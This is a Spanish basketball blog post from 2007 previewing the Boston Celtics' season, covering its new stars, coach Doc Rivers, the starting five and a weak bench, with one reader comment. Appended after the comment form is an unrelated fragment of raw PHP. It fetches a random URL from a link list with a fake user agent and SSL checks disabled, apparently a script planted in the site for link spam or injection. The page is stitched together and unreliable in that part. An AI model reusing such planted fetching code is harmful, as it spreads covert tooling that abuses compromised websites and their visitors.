Boston Celtics: la larga espera (2ª parte)

19 de December de 2007 por Jabho

Boston Celtics: la larga espera (1ª parte)

La llegada de Ray Allen y Kevin Garnett a Boston consolidó el nuevo Big Three de la liga. Con ellos los Celtics vuelven a contar en todos los pronósticos al menos como aspirantes a ganar la conferencia Este. El cinco titular está plagado de talento y a la altura de los mejores de la liga. Sin embargo el banquillo se antoja corto, poco equilibrado y con menos alternativas de las que disponen otros aspirantes al anillo. Porque este es el objetivo final, el anillo. Para luchar por él han llegado a Boston Ray Allen y, sobre todo, Kevin Garnett.

The Big Ticket llegó a la liga en 1995 como el primer jugador que fue drafteado sin haber pasado por la universidad. Ha jugado sus primeras 11 temporadas en Minnesota, rodeado de buenas plantillas unas veces y otras no tanto. En todos estos años él siempre ha cumplido. Sus números son no ya de los mejores de la liga, sino de los mejores de la historia. Sin embargo en los Playoffs ha acumulado fracasos y decepciones. La temporada 03/04 marcó el momento cumbre de su ciclo en Minnesota, cuando perdió en la final de conferencia ante los Lakers de Kobe & Shaq. A sus 31 años llega a Boston en la que sabe puede ser su última oportunidad para luchar por el campeonato.

En la temporada que arranca Doc Rivers dispondrá de la mejor plantilla que posiblemente haya dirigido en su, todavía, corta carrera. Su primera etapa en Orlando fue esperanzadora y fue nombrado entrenador del año en la temporada de su debut. Aquel equipo se caracterizó por ser muy trabajador en ambos lados de la cancha. Tres temporadas seguidas siendo eliminado en 1ª ronda de Playoffs y una última desastrosa cerraron su ciclo de entrenador en la franquicia. ¿Balance? Luces y sombras.

Desde la temporada 04-05 dirige a los Celtics. Son tres temporadas en los que el equipo no ha logrado clasificarse para Playoffs. Si bien es verdad que la plantilla nunca estuvo a la altura de lo esperado, también lo es que despierta muchas dudas sobre si es el entrenador idóneo para un proyecto tan ambicioso. De momento el equipo ha arrancado con un balance de 19-2 y siendo el mejor equipo de la liga en el apartado defensivo.

La dirección del juego recaerá en el jugador de segundo año Rajon Rondo. Rondo es un base alto, atlético, muy buen defensor, organizado y buen penetrador. En su año de rookie demostró madurez para dirigir al equipo y en su segundo año debe confirmarlo en un equipo con objetivos más ambiciosos. Es el único base puro de la plantilla que cuenta para el entrenador. En defensa destaca por sus rápidas manos aunque sufre un poco con bases muy veloces. En ataque el año pasado dejó muy mala sensación su tiro de media o larga distancia. Este año ha mejorado, al menos en la media distancia, aunque es una faceta del juego que debe seguir trabajando.

Como escolta saldrá Ray Allen, posiblemente, el mejor tirador de la liga. En los Sonics era el jugador de referencia en ataque y promediaba cerca de 25 puntos por noche con altos porcentajes de tiro. En los Celtics comparte galones y eso se notará, pero no por ello dejará de ser un jugador importante y una de las estrellas de la liga. Seis All Stars dan fe de ello.

Como alero saldrá el capitán, Paul Pierce. Durante años Pierce ha sido el eje por el que pasaba el juego y las esperanzas de Boston. Sin embargo la llegada de Garnett le relega al rol de segundo de abordo. Que lo asuma con naturalidad es clave para que la química en la plantilla sea buena. The Truth es un jugador muy completo capaz de anotar, defender, rebotear y pasar.

El ala-pívot titular será, como no podía ser de otra manera, Kevin Garnett. Es uno de los mejores y más completos de la liga, pero le falta un anillo con el que redondear una gran carrera. Es capaz de anotar, rebotear, asistir y defender. De ello dan fe sus estadísticas a lo largo de su carrera: 20.5 puntos, 11.3 rebotes, 4.5 asistencias, 1.4 robos y 1.7 tapones. Las dudas sobre él no se centran en ninguna faceta del juego, sino en si será capaz de liderar al equipo en los momentos decisivos. La respuesta a esta pregunta es la clave para el proyecto verde. De momento, en el cuarto de temporada jugado, ha empezado a gran nivel de juego y de motivación, ejerciendo de líder cuando se le ha necesitado.

Kedrick Perkins acompañará a Garnett en la pintura. Es un pívot trabajador en defensa y buen reboteador pero debe tener cuidado con su tendencia a cargarse de faltas rápidamente. En ataque es limitado, aunque capaz de aprovechar los espacios que generan las estrellas del equipo.

El banco es lo más flojo de Boston. En el juego exterior House, especialista en tiro de 3 puntos, y Posey, especialista defensivo con experiencia y una anillo en su haber, aportarán lo que se espera de ellos aunque en muchos momentos se echará de menos un base puro. En la pintura el relevo de los titulares es complicado ya que ni Pollard ni Scalabrine ni Powe son capaces de dar minutos de garantías. Habrá que esperar a la evolución de Glen Davis, recién llegado del draft este año, para ver si éste puede aportar algo de calidad en la pintura desde el banco.

La temporada ha empezado muy bien para Boston. Su balance es de 19-2, líder de la liga, defendiendo duro y encontrando en ataque distintas alternativas. Han ganado muchos partidos cómodamente y otros sobre la bocina, demostrando saber jugar los minutos complicados. Kevin Garnett suena como candidato al MVP y, de momento, la química con los otros All Stars del equipo es muy buena. Sin lucha de egos y con viento a favor se prevé una temporada regular fácil para los Celtics. En casa el equipo está invicto tras 12 partidos. La última vez que esto pasó fue en el 85. Entonces, el trío Bird-Mchale-Parish llevó al equipo hasta las finales de la liga.

Luego llegarán los Playoffs y, por tanto, el momento de la verdad. La expectativas generadas son muy altas y la exigencia también. No llegar a la final de conferencia sería un fracaso. Jugar la final de la NBA cumpliría las expectativas, pero tampoco seria un gran éxito. Tras la larga espera, el anillo es lo único que vale.

Quinteto: Rondo, Allen, Pierce, Garnett y Perkins
Sexto hombre: Posey
Predicción:
Finalista

Comenta

Un comentario a esta entrada

  1. Dantley dice:
    #1

    Lo cierto es que nadie se esperaba algo tan rápido. Creo que la clave es lo que se comenta en el artículo, no hay lucha de egos y eso se nota.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>